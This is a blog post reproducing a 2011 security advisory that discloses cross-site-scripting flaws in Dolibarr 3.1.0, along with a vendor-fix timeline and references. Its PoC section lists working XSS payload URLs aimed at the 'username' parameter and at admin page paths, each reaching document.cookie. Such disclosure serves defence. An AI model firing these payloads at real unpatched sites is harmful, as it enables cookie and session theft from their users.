Nov 10: INFOSERVE-ADV2011-03 - Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0

Advisory:
Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory ID:
INFOSERVE-ADV2011-03
Author:
Stefan Schurtz
Contact:
Affected Software:
Successfully tested on Dolibarr 3.1.0 other versions may also be affected
Vendor URL:
Vendor Status:
fixed in the 3.1 branch
 
======================
Vulnerability Description:
======================
 
Dolibarr 3.1.0 is prone to multiple XSS vulnerability
 
==============
PoC-Exploit
==============

Cross-Site-Scripting – parameter ‘username’

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>&=3&optioncss=print

IE-only
http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))

=====
Solution:
=====

Fixed in the 3.1 branch

================
Disclosure Timeline:
================

08-Nov-2011 – vendor informed
09-Nov-2011 – vendor fix in the 3.1 branch
09-Nov-2011 – release date of this security advisory
09-Nov-2011 – Post on BugTraq
 
====
Credits:
====

Vulnerabilities found and advisory written by the INFOSERVE Security Team

=======
References:
=======
 
https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1
http://www.dolibarr.org
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-03.txt
Geschrieben von Stefan Schurtz in Security Advisories Kommentare: (0) Trackbacks: (0)
Tags für diesen Artikel: , , ,
Zuletzt bearbeitet am 18.11.2011 11:05

Trackbacks
Trackback-URL für diesen Eintrag

Keine Trackbacks

Kommentare
Ansicht der Kommentare: (Linear | Verschachtelt)

Noch keine Kommentare


Kommentar schreiben


Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-Formatierung erlaubt
Sie können [geshi lang=LANG][/lang] Tags verwenden um Quellcode abhängig von der gewählten Programmiersprache einzubinden